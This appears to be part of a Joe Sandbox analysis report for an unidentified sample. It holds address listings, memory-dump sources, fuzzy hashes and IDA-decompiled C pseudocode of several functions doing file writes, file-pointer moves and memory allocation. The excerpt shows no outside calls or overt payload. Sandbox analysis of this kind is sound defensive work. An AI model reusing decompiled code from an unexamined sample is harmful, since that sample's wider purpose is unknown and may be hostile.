                                                                                                                                                                                          0x00caf54f
                                                                                                                                                                                          0x00caf55a
                                                                                                                                                                                          0x00caf573
                                                                                                                                                                                          0x00caf578
                                                                                                                                                                                          0x00caf57e
                                                                                                                                                                                          0x00caf581
                                                                                                                                                                                          0x00caf58e
                                                                                                                                                                                          0x00caf58e
                                                                                                                                                                                          0x00caf590
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00caf589
                                                                                                                                                                                          0x00caf58d
                                                                                                                                                                                          0x00caf58d
                                                                                                                                                                                          0x00caf58d
                                                                                                                                                                                          0x00caf592
                                                                                                                                                                                          0x00caf4a1
                                                                                                                                                                                          0x00caf4a4
                                                                                                                                                                                          0x00caf4a6
                                                                                                                                                                                          0x00caf4ab
                                                                                                                                                                                          0x00caf4b3
                                                                                                                                                                                          0x00caf4b3
                                                                                                                                                                                          0x00caf4b3
                                                                                                                                                                                          0x00caf4ad
                                                                                                                                                                                          0x00caf4ad
                                                                                                                                                                                          0x00caf4ad
                                                                                                                                                                                          0x00caf4b9
                                                                                                                                                                                          0x00caf4bb
                                                                                                                                                                                          0x00caf4bb
                                                                                                                                                                                          0x00caf4be
                                                                                                                                                                                          0x00caf4d3
                                                                                                                                                                                          0x00caf4df
                                                                                                                                                                                          0x00caf4ef
                                                                                                                                                                                          0x00caf4f7
                                                                                                                                                                                          0x00caf506
                                                                                                                                                                                          0x00caf50b
                                                                                                                                                                                          0x00caf515
                                                                                                                                                                                          0x00caf517
                                                                                                                                                                                          0x00caf519
                                                                                                                                                                                          0x00caf51c
                                                                                                                                                                                          0x00caf521
                                                                                                                                                                                          0x00caf528
                                                                                                                                                                                          0x00caf52b
                                                                                                                                                                                          0x00caf52e
                                                                                                                                                                                          0x00caf531
                                                                                                                                                                                          0x00caf531
                                                                                                                                                                                          0x00caf5d3
                                                                                                                                                                                          0x00caf5d3
                                                                                                                                                                                          0x00caf5d7

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ctype
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3039457973-0
                                                                                                                                                                                          • Opcode ID: 1c5e544c6bc6a8878477281281d1d1bccc568d485545ece71f94c9c1fe91b336
                                                                                                                                                                                          • Instruction ID: c849fc0efe39b21e7f27d30c4c6d42e509730c99720b64ca9df9b21cb45da0ea
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c5e544c6bc6a8878477281281d1d1bccc568d485545ece71f94c9c1fe91b336
                                                                                                                                                                                          • Instruction Fuzzy Hash: 21516671A0060ADFCF15DFA8D9409AE77B5FF85318B10862DF81697244EB70EE11DBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C85820 Relevance: 6.2, APIs: 4, Instructions: 150COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                          			E00C85820(intOrPtr* __edi, intOrPtr* _a4, signed int* _a8) {
				long _v4;
				char _v16;
				union _LARGE_INTEGER* _v20;
				union _LARGE_INTEGER _v24;
				void* _v28;
				int _v44;
				void* __ebx;
				void* __esi;
				int _t47;
				int _t50;
				int _t54;
				signed int _t55;
				void* _t56;
				int _t58;
				int _t63;
				union _LARGE_INTEGER* _t70;
				signed int _t74;
				int _t94;
				intOrPtr* _t98;
				intOrPtr* _t99;
				struct %anon52 _t102;

				_t98 = __edi;
				_t70 =  *__edi;
				_v20 = _t70;
				if( *((intOrPtr*)(__edi + 0xc4)) < 0x100) {
					__eflags =  *((intOrPtr*)(__edi + 0xc8)) - 0xffff;
					if( *((intOrPtr*)(__edi + 0xc8)) > 0xffff) {
						goto L1;
					} else {
						_t47 =  *(__edi + 0x18);
						__eflags = _t47;
						if(_t47 != 0) {
							_t68 =  *(__edi + 0x10) + _t47;
							__eflags =  *(__edi + 0x10) + _t47;
							_v4 = 0;
							goto L13;
						} else {
							_t58 =  &_v16;
							__imp__GetFileSizeEx(_t70, _t58);
							__eflags = _t58;
							if(_t58 != 0) {
								_t102 = _v24.LowPart;
								_t94 = _v20;
								asm("adc edx, 0x0");
								_t68 = E00D04130(E00D0AA40(_t102 + 7, _t94, 8, 0), _t94, 8, 0);
								_v44 = _t94;
								__eflags = _t94;
								if(_t94 > 0) {
									goto L1;
								} else {
									__eflags = _t68 - 0xffffffff;
									if(_t68 > 0xffffffff) {
										goto L1;
									} else {
										_t101 = _t68 - _t102;
										__eflags = _t68 - _t102;
										 *(__edi + 0x10) = _t68;
										if(__eflags == 0) {
											L13:
											_t99 = _a4;
											_t50 = E00C84320( *_t99,  *_t98, __eflags, _t68, _v4, _t99, _t98 + 0xccc);
											__eflags = _t50;
											if(_t50 == 0) {
												goto L15;
											} else {
												_t54 = E00C853C0(_t98,  *(_t98 + 0x18) + ( *_t99 + 7 >> 3) * 8);
												__eflags = _t54;
												if(_t54 != 0) {
													 *_a8 =  *(_t98 + 0xc4);
													_t74 =  *(_t98 + 0xc4);
													_t55 = _t74 + 0x33 + _t74 * 2;
													 *(_t98 + 0xc4) = _t74 + 1;
													 *(_t98 + _t55 * 4) =  *(_t98 + 0x18);
													_t56 = _t98 + _t55 * 4;
													 *((intOrPtr*)(_t56 + 4)) =  *_t99;
													 *((short*)(_t56 + 8)) =  *((intOrPtr*)(_t99 + 6));
													 *((short*)(_t56 + 0xa)) =  *((intOrPtr*)(_t98 + 0xc8));
													 *((intOrPtr*)(_t98 + 0xc8)) =  *((intOrPtr*)(_t98 + 0xc8)) + 1;
													_t42 = _t98 + 0x18;
													 *_t42 =  *(_t98 + 0x18) + ( *_t99 + 7 >> 3) + ( *_t99 + 7 >> 3) + ( *_t99 + 7 >> 3) + ( *_t99 + 7 >> 3) + ( *_t99 + 7 >> 3) + ( *_t99 + 7 >> 3) + ( *_t99 + 7 >> 3) + ( *_t99 + 7 >> 3);
													__eflags =  *_t42;
													return 1;
												} else {
													goto L15;
												}
											}
										} else {
											E00D006A0(__edi, __edi + 0xccc, 0, _t101);
											_push(0);
											_t63 = SetFilePointerEx(_v28, _v24, _v20, 0);
											__eflags = _t63;
											if(_t63 == 0) {
												goto L5;
											} else {
												__eflags = E00C83EE0(_v28, _t101);
												if(__eflags == 0) {
													L15:
													__eflags = 0;
													return 0;
												} else {
													goto L13;
												}
											}
										}
									}
								}
							} else {
								L5:
								_push(0xd47270);
								_push(0);
								_push(0);
								E00C88150(0xd47270);
								__eflags = 0;
								return 0;
							}
						}
					}
				} else {
					L1:
					E00C88420(0x10, 0xd47270);
					return 0;
				}
			}
























                                                                                                                                                                                          0x00c85820
                                                                                                                                                                                          0x00c8582d
                                                                                                                                                                                          0x00c85832
                                                                                                                                                                                          0x00c85836
                                                                                                                                                                                          0x00c85853
                                                                                                                                                                                          0x00c8585d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8585f
                                                                                                                                                                                          0x00c8585f
                                                                                                                                                                                          0x00c85862
                                                                                                                                                                                          0x00c85864
                                                                                                                                                                                          0x00c85926
                                                                                                                                                                                          0x00c85926
                                                                                                                                                                                          0x00c85928
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8586a
                                                                                                                                                                                          0x00c8586a
                                                                                                                                                                                          0x00c85870
                                                                                                                                                                                          0x00c85876
                                                                                                                                                                                          0x00c85878
                                                                                                                                                                                          0x00c85899
                                                                                                                                                                                          0x00c8589d
                                                                                                                                                                                          0x00c858aa
                                                                                                                                                                                          0x00c858bf
                                                                                                                                                                                          0x00c858c1
                                                                                                                                                                                          0x00c858c5
                                                                                                                                                                                          0x00c858c7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c858cd
                                                                                                                                                                                          0x00c858cd
                                                                                                                                                                                          0x00c858d0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c858d6
                                                                                                                                                                                          0x00c858d8
                                                                                                                                                                                          0x00c858d8
                                                                                                                                                                                          0x00c858da
                                                                                                                                                                                          0x00c858dd
                                                                                                                                                                                          0x00c85930
                                                                                                                                                                                          0x00c85930
                                                                                                                                                                                          0x00c85946
                                                                                                                                                                                          0x00c8594e
                                                                                                                                                                                          0x00c85950
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85952
                                                                                                                                                                                          0x00c85962
                                                                                                                                                                                          0x00c85967
                                                                                                                                                                                          0x00c85969
                                                                                                                                                                                          0x00c8597e
                                                                                                                                                                                          0x00c85980
                                                                                                                                                                                          0x00c85986
                                                                                                                                                                                          0x00c8598b
                                                                                                                                                                                          0x00c85994
                                                                                                                                                                                          0x00c85999
                                                                                                                                                                                          0x00c8599c
                                                                                                                                                                                          0x00c859a3
                                                                                                                                                                                          0x00c859ae
                                                                                                                                                                                          0x00c859b7
                                                                                                                                                                                          0x00c859cc
                                                                                                                                                                                          0x00c859cc
                                                                                                                                                                                          0x00c859cc
                                                                                                                                                                                          0x00c859d4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85969
                                                                                                                                                                                          0x00c858df
                                                                                                                                                                                          0x00c858e9
                                                                                                                                                                                          0x00c858fd
                                                                                                                                                                                          0x00c85904
                                                                                                                                                                                          0x00c8590a
                                                                                                                                                                                          0x00c8590c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85912
                                                                                                                                                                                          0x00c8591d
                                                                                                                                                                                          0x00c8591f
                                                                                                                                                                                          0x00c8596d
                                                                                                                                                                                          0x00c8596d
                                                                                                                                                                                          0x00c85973
                                                                                                                                                                                          0x00c85921
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85921
                                                                                                                                                                                          0x00c8591f
                                                                                                                                                                                          0x00c8590c
                                                                                                                                                                                          0x00c858dd
                                                                                                                                                                                          0x00c858d0
                                                                                                                                                                                          0x00c8587a
                                                                                                                                                                                          0x00c8587a
                                                                                                                                                                                          0x00c8587a
                                                                                                                                                                                          0x00c8587f
                                                                                                                                                                                          0x00c85881
                                                                                                                                                                                          0x00c85888
                                                                                                                                                                                          0x00c85892
                                                                                                                                                                                          0x00c85898
                                                                                                                                                                                          0x00c85898
                                                                                                                                                                                          0x00c85878
                                                                                                                                                                                          0x00c85864
                                                                                                                                                                                          0x00c85838
                                                                                                                                                                                          0x00c85838
                                                                                                                                                                                          0x00c85842
                                                                                                                                                                                          0x00c85852
                                                                                                                                                                                          0x00c85852

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileSizeEx.KERNEL32(?,?), ref: 00C85870
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileSize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3433856609-0
                                                                                                                                                                                          • Opcode ID: 9ecb314695bc043177f98cc6a8ca3fbca95359e18793b58fa46c010c635e7a9b
                                                                                                                                                                                          • Instruction ID: c11e6223aa10661b6c429fc315734bd5354654b32b968868f11df9d989888195
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ecb314695bc043177f98cc6a8ca3fbca95359e18793b58fa46c010c635e7a9b
                                                                                                                                                                                          • Instruction Fuzzy Hash: BB51C470704702ABE714EF24CC81BA6B3E4FF84314F54862DE95983381E771E959CB99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C81AC0 Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                          			E00C81AC0(char* __edx, void* __ebp, void* __eflags) {
				signed int _v8;
				char _v24;
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				char _v76;
				char _v80;
				void* _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t40;
				void* _t44;
				signed int _t46;
				signed int _t50;
				void* _t51;
				signed int _t53;
				signed int _t54;
				void* _t57;
				char _t58;
				void* _t66;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				void* _t77;
				void* _t79;

				_t69 = __edx;
				_t75 =  &_v92;
				_t34 =  *0xd64070; // 0x8a9e1774
				_v8 = _t34 ^ _t75;
				_t71 = 0;
				_t58 = E00D017AD(_t57, __edx, 0, 0x400);
				_t76 = _t75 + 4;
				_v80 = _t58;
				if(_t58 != 0) {
					_v76 = 0;
					_v72 = 0;
					_v68 = 0;
					_v64 = 0;
					_v60 = 0;
					_v56 = 0;
					_v52 = 0;
					_v48 = 0;
					_v44 = 0;
					_t40 = E00C81560( &_v76, _t58,  &_v92);
					_t77 = _t76 + 4;
					__eflags = _t40;
					if(__eflags != 0) {
						_t44 = _v92;
						_t71 = 1;
						__eflags = _t44 - 0x80;
						if(_t44 < 0x80) {
							_t44 = 0x80;
						}
						_t72 = _t44 + _t44;
						__eflags = _t72 - 0x400;
						if(_t72 > 0x400) {
							_t72 = 0x400;
						}
						_t74 = E00D017AD(_t58, _t69, _t71, _t72);
						_t77 = _t77 + 4;
						__eflags = _t74;
						if(__eflags != 0) {
							_t69 =  &_v76;
							_t59 = _t74;
							_t46 = E00C81770(_t74, _t72,  &_v76,  &_v92);
							_t79 = _t77 + 0xc;
							__eflags = _t46;
							if(__eflags != 0) {
								_t72 =  &_v40;
								E00C81380(_t71,  &_v40, __eflags, _t74, _v92);
								_t59 = _v48;
								_t69 = 0xd47738;
								_v92 = 0x10;
								_t50 = E00C87700(_v48, 0xd47738, _t74,  &_v24,  &_v92);
								_t79 = _t79 + 0x10;
								__eflags = _t50;
								if(__eflags == 0) {
									_t51 = 0x10;
									_t66 = 0;
									while(1) {
										_t69 =  *((intOrPtr*)(_t79 + _t66 + 0x44));
										__eflags =  *((intOrPtr*)(_t79 + _t66 + 0x44)) -  *((intOrPtr*)(_t79 + _t66 + 0x54));
										if(__eflags != 0) {
											goto L18;
										}
										_t51 = _t51 - 4;
										_t66 = _t66 + 4;
										__eflags = _t51 - 4;
										if(_t51 >= 4) {
											continue;
										} else {
											_t52 = _v68;
											__eflags = _v68;
											if(__eflags == 0) {
												L17:
												_t71 = 3;
											} else {
												_t72 =  &_v92;
												_t53 = E00C83DF0( &_v92, _t52);
												_t79 = _t79 + 4;
												__eflags = _t53;
												if(__eflags != 0) {
													_t54 = E00C818D0( &_v92);
													_t71 = 2;
													__eflags = _t54;
													if(__eflags == 0) {
														goto L17;
													}
												}
											}
										}
										goto L18;
									}
								}
							}
							L18:
							_push(_t74);
							E00D0092B(_t59, _t69, _t71, _t72, __eflags);
							_t58 = _v80;
							_t77 = _t79 + 4;
						} else {
							SetLastError(8);
						}
					}
					E00D0092B(_t58, _t69, _t71, _t72, __eflags);
					__eflags = _v8 ^ _t77 + 0x00000004;
					return E00D0071A(_t71, _t58, _v8 ^ _t77 + 0x00000004, _t69, _t71, _t72, _t58);
				} else {
					SetLastError(8);
					return E00D0071A(0, _t58, _v8 ^ _t76, _t69, 0, _t72);
				}
			}




































                                                                                                                                                                                          0x00c81ac0
                                                                                                                                                                                          0x00c81ac0
                                                                                                                                                                                          0x00c81ac3
                                                                                                                                                                                          0x00c81aca
                                                                                                                                                                                          0x00c81ad7
                                                                                                                                                                                          0x00c81ade
                                                                                                                                                                                          0x00c81ae0
                                                                                                                                                                                          0x00c81ae3
                                                                                                                                                                                          0x00c81ae9
                                                                                                                                                                                          0x00c81b0a
                                                                                                                                                                                          0x00c81b0e
                                                                                                                                                                                          0x00c81b12
                                                                                                                                                                                          0x00c81b16
                                                                                                                                                                                          0x00c81b1a
                                                                                                                                                                                          0x00c81b1e
                                                                                                                                                                                          0x00c81b22
                                                                                                                                                                                          0x00c81b26
                                                                                                                                                                                          0x00c81b2a
                                                                                                                                                                                          0x00c81b39
                                                                                                                                                                                          0x00c81b3e
                                                                                                                                                                                          0x00c81b41
                                                                                                                                                                                          0x00c81b43
                                                                                                                                                                                          0x00c81b49
                                                                                                                                                                                          0x00c81b4d
                                                                                                                                                                                          0x00c81b52
                                                                                                                                                                                          0x00c81b57
                                                                                                                                                                                          0x00c81b59
                                                                                                                                                                                          0x00c81b59
                                                                                                                                                                                          0x00c81b5e
                                                                                                                                                                                          0x00c81b61
                                                                                                                                                                                          0x00c81b67
                                                                                                                                                                                          0x00c81b69
                                                                                                                                                                                          0x00c81b69
                                                                                                                                                                                          0x00c81b74
                                                                                                                                                                                          0x00c81b76
                                                                                                                                                                                          0x00c81b79
                                                                                                                                                                                          0x00c81b7b
                                                                                                                                                                                          0x00c81b8f
                                                                                                                                                                                          0x00c81b95
                                                                                                                                                                                          0x00c81b97
                                                                                                                                                                                          0x00c81b9c
                                                                                                                                                                                          0x00c81b9f
                                                                                                                                                                                          0x00c81ba1
                                                                                                                                                                                          0x00c81bad
                                                                                                                                                                                          0x00c81bb1
                                                                                                                                                                                          0x00c81bb6
                                                                                                                                                                                          0x00c81bc8
                                                                                                                                                                                          0x00c81bcd
                                                                                                                                                                                          0x00c81bd5
                                                                                                                                                                                          0x00c81bda
                                                                                                                                                                                          0x00c81bdd
                                                                                                                                                                                          0x00c81bdf
                                                                                                                                                                                          0x00c81be1
                                                                                                                                                                                          0x00c81be6
                                                                                                                                                                                          0x00c81bf0
                                                                                                                                                                                          0x00c81bf0
                                                                                                                                                                                          0x00c81bf4
                                                                                                                                                                                          0x00c81bf8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c81bfa
                                                                                                                                                                                          0x00c81bfd
                                                                                                                                                                                          0x00c81c00
                                                                                                                                                                                          0x00c81c03
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c81c05
                                                                                                                                                                                          0x00c81c05
                                                                                                                                                                                          0x00c81c09
                                                                                                                                                                                          0x00c81c0b
                                                                                                                                                                                          0x00c81c2c
                                                                                                                                                                                          0x00c81c2c
                                                                                                                                                                                          0x00c81c0d
                                                                                                                                                                                          0x00c81c0e
                                                                                                                                                                                          0x00c81c12
                                                                                                                                                                                          0x00c81c17
                                                                                                                                                                                          0x00c81c1a
                                                                                                                                                                                          0x00c81c1c
                                                                                                                                                                                          0x00c81c1e
                                                                                                                                                                                          0x00c81c23
                                                                                                                                                                                          0x00c81c28
                                                                                                                                                                                          0x00c81c2a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c81c2a
                                                                                                                                                                                          0x00c81c1c
                                                                                                                                                                                          0x00c81c0b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c81c03
                                                                                                                                                                                          0x00c81bf0
                                                                                                                                                                                          0x00c81bdf
                                                                                                                                                                                          0x00c81c31
                                                                                                                                                                                          0x00c81c31
                                                                                                                                                                                          0x00c81c32
                                                                                                                                                                                          0x00c81c37
                                                                                                                                                                                          0x00c81c3b
                                                                                                                                                                                          0x00c81b7d
                                                                                                                                                                                          0x00c81b7f
                                                                                                                                                                                          0x00c81b7f
                                                                                                                                                                                          0x00c81b7b
                                                                                                                                                                                          0x00c81c3f
                                                                                                                                                                                          0x00c81c51
                                                                                                                                                                                          0x00c81c5b
                                                                                                                                                                                          0x00c81aeb
                                                                                                                                                                                          0x00c81aed
                                                                                                                                                                                          0x00c81b07
                                                                                                                                                                                          0x00c81b07

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _malloc.LIBCMT ref: 00C81AD9
                                                                                                                                                                                            • Part of subcall function 00D017AD: __FF_MSGBANNER.LIBCMT ref: 00D017D0
                                                                                                                                                                                            • Part of subcall function 00D017AD: __NMSG_WRITE.LIBCMT ref: 00D017D7
                                                                                                                                                                                            • Part of subcall function 00D017AD: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00D0C457,?,00000001,?,?,00D0EF54,00000018,00D590E8,0000000C,00D0EFE5), ref: 00D01824
                                                                                                                                                                                          • SetLastError.KERNEL32(00000008), ref: 00C81AED
                                                                                                                                                                                          • _malloc.LIBCMT ref: 00C81B6F
                                                                                                                                                                                          • SetLastError.KERNEL32(00000008), ref: 00C81B7F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast_malloc$AllocateHeap
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1551238847-0
                                                                                                                                                                                          • Opcode ID: c386467fa21645b3529a56fcf63cef6105ade2d18e69ab11bc9002c679442d74
                                                                                                                                                                                          • Instruction ID: cf13ab3a9d9935c99bf22de4f4313011254f85af65b206b19a38a64f74c7466a
                                                                                                                                                                                          • Opcode Fuzzy Hash: c386467fa21645b3529a56fcf63cef6105ade2d18e69ab11bc9002c679442d74
                                                                                                                                                                                          • Instruction Fuzzy Hash: 804172B1A043045BD700EF65D841B6B77E9BBC4308F48093DF95AD7241EA35DA0A8BA7
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C84320 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                                                                          			E00C84320(long __eax, void* __ebx, void* __eflags, union _LARGE_INTEGER _a4, union _LARGE_INTEGER* _a8, void* _a12, intOrPtr _a16) {
				long _v4;
				void* __edi;
				void* __esi;
				void* _t14;
				long _t37;
				void* _t43;
				union _LARGE_INTEGER* _t45;
				void* _t46;
				void* _t47;

				_t45 = _a8;
				_t37 = __eax;
				_push(_a16);
				_t43 = (__eax + 7 >> 3) + (__eax + 7 >> 3) + (__eax + 7 >> 3) + (__eax + 7 >> 3) + (__eax + 7 >> 3) + (__eax + 7 >> 3) + (__eax + 7 >> 3) + (__eax + 7 >> 3);
				_push(_t43);
				_t14 = E00C83FD0(__ebx, _a4.LowPart, _t45);
				_t47 = _t46 + 0x14;
				if(_t14 == 0) {
					L9:
					return 0;
				} else {
					_push(0);
					if(SetFilePointerEx(__ebx, _a4.LowPart, _t45, 0) == 0 || WriteFile(__ebx, _a12, _t37,  &_v4, 0) == 0) {
						L7:
						_push(0xd47270);
						_push(0);
						_push(0);
						E00C88150(0xd47270);
						return 0;
					} else {
						if(_t37 == _v4) {
							_t44 = _t43 == _t37;
							if(_t43 == _t37) {
								L10:
								return 1;
							} else {
								E00D006A0(_t37, _a16, 0, _t44);
								_t47 = _t47 + 0xc;
								_push(0);
								asm("adc eax, ebp");
								if(SetFilePointerEx(__ebx, _t37 + _a4, 0, 0) != 0) {
									if(E00C83EE0(__ebx, _t44) != 0) {
										goto L10;
									} else {
										goto L9;
									}
								} else {
									goto L7;
								}
							}
						} else {
							E00C88420(1, 0xd47270);
							return 0;
						}
					}
				}
			}












                                                                                                                                                                                          0x00c84326
                                                                                                                                                                                          0x00c8432c
                                                                                                                                                                                          0x00c8433a
                                                                                                                                                                                          0x00c8433d
                                                                                                                                                                                          0x00c8433f
                                                                                                                                                                                          0x00c84343
                                                                                                                                                                                          0x00c84348
                                                                                                                                                                                          0x00c8434d
                                                                                                                                                                                          0x00c843fa
                                                                                                                                                                                          0x00c843fe
                                                                                                                                                                                          0x00c84353
                                                                                                                                                                                          0x00c84357
                                                                                                                                                                                          0x00c84366
                                                                                                                                                                                          0x00c843cc
                                                                                                                                                                                          0x00c843cc
                                                                                                                                                                                          0x00c843d1
                                                                                                                                                                                          0x00c843d3
                                                                                                                                                                                          0x00c843da
                                                                                                                                                                                          0x00c843e8
                                                                                                                                                                                          0x00c84380
                                                                                                                                                                                          0x00c84384
                                                                                                                                                                                          0x00c8439f
                                                                                                                                                                                          0x00c843a1
                                                                                                                                                                                          0x00c84401
                                                                                                                                                                                          0x00c84408
                                                                                                                                                                                          0x00c843a3
                                                                                                                                                                                          0x00c843ab
                                                                                                                                                                                          0x00c843b0
                                                                                                                                                                                          0x00c843b9
                                                                                                                                                                                          0x00c843bd
                                                                                                                                                                                          0x00c843ca
                                                                                                                                                                                          0x00c843f6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c843ca
                                                                                                                                                                                          0x00c84386
                                                                                                                                                                                          0x00c84390
                                                                                                                                                                                          0x00c8439e
                                                                                                                                                                                          0x00c8439e
                                                                                                                                                                                          0x00c84384
                                                                                                                                                                                          0x00c84366

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C83FD0: GetFileSizeEx.KERNEL32(?,?), ref: 00C83FE1
                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 00C8435E
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000,00000000), ref: 00C84376
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C843AB
                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000), ref: 00C843C2
                                                                                                                                                                                          Memory Dump Source
